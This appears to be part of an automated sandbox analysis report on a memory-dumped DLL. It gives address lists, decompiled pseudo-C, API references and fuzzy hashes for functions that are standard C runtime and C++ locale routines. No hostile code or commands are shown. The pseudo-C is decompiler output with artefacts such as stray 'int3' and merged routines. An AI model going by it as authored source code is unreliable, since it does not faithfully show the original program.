0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3
0x6dddf856
0x6dddf856
0x6dddf859
0x6dddf85d
0x6dddf861
0x6dddf86e
0x6dddf876
0x6dddf878
0x00000000
0x6dddf878
0x6dddf83f
0x6dddf83f
0x00000000
0x6dddf83f
0x6dddf83d
0x6dddf7b0
0x6dddf7b0
0x6dddf7b3
0x6dddf7b7
0x6dddf7bb
0x6dddf7c8
0x6dddf7d0
0x6dddf7d2
0x00000000
0x6dddf7d2
0x6dddf799
0x6dddf799
0x00000000
0x6dddf799
0x6dddf797
0x6dddf70a
0x6dddf70a
0x6dddf70d
0x6dddf711
0x6dddf715
0x6dddf722
0x6dddf72a
0x6dddf72c
0x00000000
0x6dddf72c
0x6dddf6f3
0x6dddf6f3
0x00000000
0x6dddf6f3
0x6dddf6f1
0x6dddf664
0x6dddf664
0x6dddf667
0x6dddf66b
0x6dddf66f
0x6dddf67c
0x6dddf684
0x6dddf686
0x00000000
0x6dddf686
0x6dddf64d
0x6dddf64d
0x00000000
0x6dddf64d
0x6dddf64b
0x6dddf5be
0x6dddf5be
0x6dddf5c1
0x6dddf5c5
0x6dddf5c9
0x6dddf5d6
0x6dddf5de
0x6dddf5e0
0x00000000
0x6dddf5e0
0x6dddf5a7
0x6dddf5a7
0x00000000
0x6dddf5a7
0x6dddf5a5
0x6dddf518
0x6dddf518
0x6dddf51b
0x6dddf51f
0x6dddf523
0x6dddf530
0x6dddf538
0x6dddf53a
0x00000000
0x6dddf53a
0x6dddf501
0x6dddf501
0x00000000
0x6dddf501
0x6dddf4ff
0x6dddf472
0x6dddf472
0x6dddf475
0x6dddf479
0x6dddf47d
0x6dddf48a
0x6dddf492
0x6dddf494
0x00000000
0x6dddf494
0x6dddf45b
0x6dddf45b
0x00000000
0x6dddf45b
0x6dddf459
0x6dddf3cc
0x6dddf3cc
0x6dddf3cf
0x6dddf3d3
0x6dddf3d7
0x6dddf3e4
0x6dddf3ec
0x6dddf3ee
0x00000000
0x6dddf3ee
0x6dddf3b5
0x6dddf3b5
0x00000000
0x6dddf3b5
0x6dddf3b3

APIs

__EH_prolog3.LIBCMT ref: 6DDDF37C
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF386
int.LIBCPMT ref: 6DDDF39D

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF3D7
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF3F7
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF415

Strings

pmm, xrefs: 6DDDF391

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: pmm
API String ID: 651022567-4180949709
Opcode ID: 22ea6cd76316958ee0a4c01c4253b05f027229ad4df8d0e4e278af557804cbdd
Instruction ID: d15b1a60124ce90231f174f78074abb6308cc34ab0dd48562c828c1df48afa91
Opcode Fuzzy Hash: 22ea6cd76316958ee0a4c01c4253b05f027229ad4df8d0e4e278af557804cbdd
Instruction Fuzzy Hash: 6A11A0B6808519DBCF01FBA4C840AFDB774AF44318F27400AF621AB291DF749A06CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE22C2B, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DE22C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x6de9506c; // 0x20895150
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6de976f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6de976f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6DE1367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6de976f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6de976f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6de976f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6DE1CF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6DE1CF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6DDEF8A5(_v8 ^ _t133, _t129, _t132);
			}

0x6de22c33
0x6de22c3a
0x6de22c3d
0x6de22c45
0x6de22c49
0x6de22c55
0x6de22c58
0x6de22c5b
0x6de22c62
0x6de22c6a
0x6de22c6d
0x6de22c73
0x6de22c79
0x6de22c7e
0x6de22c80
0x6de22c83
0x6de22c88
0x6de22c92
0x6de22c99
0x6de22c9c
0x6de22ca3
0x6de22caa
0x6de22cc5
0x6de22ccd
0x6de22cd6
0x6de22cfc
0x6de22cfe
0x00000000
0x6de22cd8
0x6de22cdb
0x6de22da2
0x6de22dae
0x6de22db9
0x6de22dbe
0x6de22ce1
0x6de22ce8
0x6de22ced
0x6de22cf3
0x6de22cf9
0x00000000
0x6de22cf9
0x6de22cf3
0x6de22cdb
0x6de22cac
0x6de22cb0
0x6de22cb3
0x6de22cb9
0x6de22cbb
0x6de22cbe
0x6de22cc2
0x6de22cff
0x6de22d02
0x6de22d03
0x6de22d08
0x6de22d0e
0x6de22d14
0x6de22d23
0x6de22d29
0x6de22d2f
0x6de22d34
0x6de22d50
0x6de22dc3
0x6de22dc9
0x6de22d52
0x6de22d5a
0x6de22d63
0x6de22d69
0x00000000
0x6de22d6b
0x6de22d6d
0x6de22d70
0x6de22d89
0x00000000
0x6de22d8b
0x6de22d8f
0x6de22d91
0x6de22d94
0x00000000
0x6de22d94
0x6de22d8f
0x6de22d89
0x6de22d69
0x6de22d63
0x6de22d50
0x6de22d34
0x6de22d0e
0x00000000
0x6de22d97
0x6de22d97
0x6de22dcb
0x6de22ddd

APIs

GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6DE233A0,?,?,00000000,?,?,?), ref: 6DE22C6D
__fassign.LIBCMT ref: 6DE22CE8
__fassign.LIBCMT ref: 6DE22D03
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6DE22D29
WriteFile.KERNEL32(?,00000000,00000000,6DE233A0,00000000,?,?,?,?,?,?,?,?,?,6DE233A0,?), ref: 6DE22D48
WriteFile.KERNEL32(?,?,00000001,6DE233A0,00000000,?,?,?,?,?,?,?,?,?,6DE233A0,?), ref: 6DE22D81

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3a10d5dc533f734151e5220854672d1dcc64ed0130d323453bddd69c40fbe67b
Instruction ID: 104513e5977ea89ddfb3f21c2a0ca18cf07bb6de8ea858be2271a30c6aaaa3a2
Opcode Fuzzy Hash: 3a10d5dc533f734151e5220854672d1dcc64ed0130d323453bddd69c40fbe67b
Instruction Fuzzy Hash: C95182B1E112499FDB20CFA8C885BEEBBF8EF19300F25455AE955E7281DB30D941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF3F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E6DDF3F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6de9506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6DDF3F20(_t74, __edx);
				E6DDF5267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6DDF5920(_t74, 0xfffffffe, _t93, 0x6de9506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6DDF58D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6DDF3F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6de3e698;
											if(__eflags != 0) {
												_t70 = E6DE37400(__eflags, 0x6de3e698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6de3e698; // 0x6ddf3b1a
													 *0x6de3a26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6DDF5904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6DDF5920(_t63, _t90, _t93, 0x6de9506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6DDF3F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6DDF58E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6DE12281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = RtlAllocateHeap( *0x6de97b04, 0, _t95); // executed
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6DE2BEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6DE19256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}

0x6ddf3f60
0x6ddf3f66
0x6ddf3f67
0x6ddf3f6b
0x6ddf3f6c
0x6ddf3f73
0x6ddf3f76
0x6ddf3f7c
0x6ddf3f7d
0x6ddf3f7e
0x6ddf3f85
0x6ddf3f88
0x6ddf3f8b
0x6ddf3f93
0x6ddf3f98
0x6ddf3f9b
0x6ddf3f9e
0x6ddf3fa5
0x6ddf4006
0x6ddf4009
0x6ddf4011
0x6ddf4018
0x00000000
0x6ddf4018
0x00000000
0x6ddf3fa7
0x6ddf3fa7
0x6ddf3fad
0x6ddf3fb3
0x6ddf3fb9
0x6ddf4029
0x6ddf4032
0x6ddf3fbb
0x6ddf3fc0
0x6ddf3fc0
0x6ddf3fc3
0x6ddf3fc6
0x6ddf3fc9
0x6ddf3fcc
0x6ddf3fcf
0x6ddf3fd2
0x6ddf3fd7
0x6ddf3fed
0x00000000
0x6ddf3fd9
0x6ddf3fd9
0x6ddf3fdb
0x6ddf3fe0
0x6ddf3fe2
0x6ddf3fe5
0x6ddf3fe7
0x6ddf3ffd
0x6ddf401d
0x6ddf401d
0x6ddf401e
0x6ddf4021
0x00000000
0x6ddf3fe9
0x6ddf3fe9
0x6ddf4033
0x6ddf4036
0x6ddf403c
0x6ddf403e
0x6ddf4045
0x6ddf404c
0x6ddf4051
0x6ddf4054
0x6ddf4056
0x6ddf4058
0x6ddf4065
0x6ddf406b
0x6ddf406d
0x6ddf4070
0x6ddf4070
0x6ddf4073
0x6ddf4073
0x6ddf4045
0x6ddf4079
0x6ddf407b
0x6ddf4080
0x6ddf4083
0x6ddf4086
0x6ddf408e
0x6ddf4092
0x6ddf4097
0x6ddf4097
0x6ddf409a
0x6ddf409b
0x6ddf409e
0x6ddf40a1
0x6ddf40ac
0x6ddf40ae
0x6ddf40b1
0x6ddf40b6
0x6ddf40ba
0x6de123d7
0x6de1f26f
0x6de1f272
0x6de1f273
0x6de1f276
0x6de1f279
0x6de1f2ab
0x6de1f2b0
0x6de1f2b6
0x6de1f2b6
0x6de1f27b
0x6de1f27b
0x6de1f27d
0x6de1f27f
0x6de1f27f
0x6de1f296
0x6de1f29f
0x6de1f2a5
0x6de1f2a7
0x00000000
0x00000000
0x6de1f287
0x6de1f289
0x00000000
0x6de1f28b
0x6de1f28c
0x6de1f291
0x6de1f292
0x6de1f294
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1f294
0x00000000
0x6de1f289
0x6de1f2a9
0x6de1f2b8
0x6de1f2ba
0x6ddf3feb
0x00000000
0x6ddf3feb
0x6ddf3fe9
0x6ddf3fe7
0x00000000
0x6ddf3ff0
0x6ddf3ff0
0x6ddf3ff2
0x6ddf3ff9
0x00000000
0x6ddf3ffb
0x00000000
0x6ddf3ff9
0x6ddf3fb9
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6DDF3F8B
___except_validate_context_record.LIBVCRUNTIME ref: 6DDF3F93
_ValidateLocalCookies.LIBCMT ref: 6DDF4021
__IsNonwritableInCurrentImage.LIBCMT ref: 6DDF404C
_ValidateLocalCookies.LIBCMT ref: 6DDF40A1

Strings

csm, xrefs: 6DDF4036

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9c86270efe3cc47c3a1d61a9ab946b776f8102da95491efc94747f91a47e6e70
Instruction ID: b382dfe08ff69303ac4c97dacf90e362956c7bc857fa00feeffaec08ff1ced44
Opcode Fuzzy Hash: 9c86270efe3cc47c3a1d61a9ab946b776f8102da95491efc94747f91a47e6e70
Instruction Fuzzy Hash: 7E41B234A04209EBCF00EF68C840AAE7BB5EF45328F16C155F9149B356D732DA16CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2D29B, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE2D29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6DE2CF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6DE2CF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6DE2CF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6DE2CF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6DE2CF81(_t5, 2);
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6DE2CF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6DE2CF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6DE2CF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6DE2CF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6DE2CF81(_t13, 2);
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6DE1CBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6de2d2a1
0x6de2d2a6
0x6de2d2af
0x6de2d2b4
0x6de2d2ba
0x6de2d2bf
0x6de2d2c5
0x6de2d2ca
0x6de2d2d0
0x6de2d2d5
0x6de2d2de
0x6de2d2e9
0x6de2d2f4
0x6de2d2ff
0x6de2d304
0x6de2d30d
0x6de2d312
0x6de2d31b
0x6de2d323
0x6de2d32c
0x6de2d331
0x6de2d33a
0x6de2d33f
0x6de2d348
0x6de2d353
0x6de2d35e
0x6de2d369
0x00000000
0x6de2d379
0x6de2d37e

APIs

Part of subcall function 6DE2CF81: _free.LIBCMT ref: 6DE2CFAA

_free.LIBCMT ref: 6DE2D2E9

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE2D2F4
_free.LIBCMT ref: 6DE2D2FF
_free.LIBCMT ref: 6DE2D353
_free.LIBCMT ref: 6DE2D35E
_free.LIBCMT ref: 6DE2D369
_free.LIBCMT ref: 6DE2D374

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction ID: 951ca8434bad5311aa123dca6ae97f31c248099c24918fce376f70bb1222d510
Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction Fuzzy Hash: A8118171B49B08AAE620A7B0CC85FDBB7ED9F0070CF518E2DA399E6051DF35F5144650

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDEF91, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDEF98
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDEFA2
int.LIBCPMT ref: 6DDDEFB9

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

collate.LIBCPMT ref: 6DDDEFDC
std::_Facet_Register.LIBCPMT ref: 6DDDEFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF013
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF031

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 7afa3f912d934ffaf844dd9995da11ddccc5645e43674609d4fe1fa07d0ae0dd
Instruction ID: 28f3a08b1220108f47b491c578490e750a962449267921eef35a724bdf6a5aab
Opcode Fuzzy Hash: 7afa3f912d934ffaf844dd9995da11ddccc5645e43674609d4fe1fa07d0ae0dd
Instruction Fuzzy Hash: 8E11E575849119DBCF05FB64C840BFDB7B5AF44318F26440AF625AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF9F1, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDF9F8
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFA02
int.LIBCPMT ref: 6DDDFA19

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

numpunct.LIBCPMT ref: 6DDDFA3C
std::_Facet_Register.LIBCPMT ref: 6DDDFA53
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFA73
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFA91

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 087f9d86eaaadbd709a7a33f0fdf863f87e3b7a8835653503d254aeb1af545d9
Instruction ID: f4cd8d3ed556c2c5fe17936270260012bc049f072632098db308f716c4ae7035
Opcode Fuzzy Hash: 087f9d86eaaadbd709a7a33f0fdf863f87e3b7a8835653503d254aeb1af545d9
Instruction Fuzzy Hash: F811C275908129DBCF01FBA4C840AFDB7B4AF84718F264109F611AB290DF74A902CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB9E4, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDEB9EB
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB9F5
int.LIBCPMT ref: 6DDEBA0C

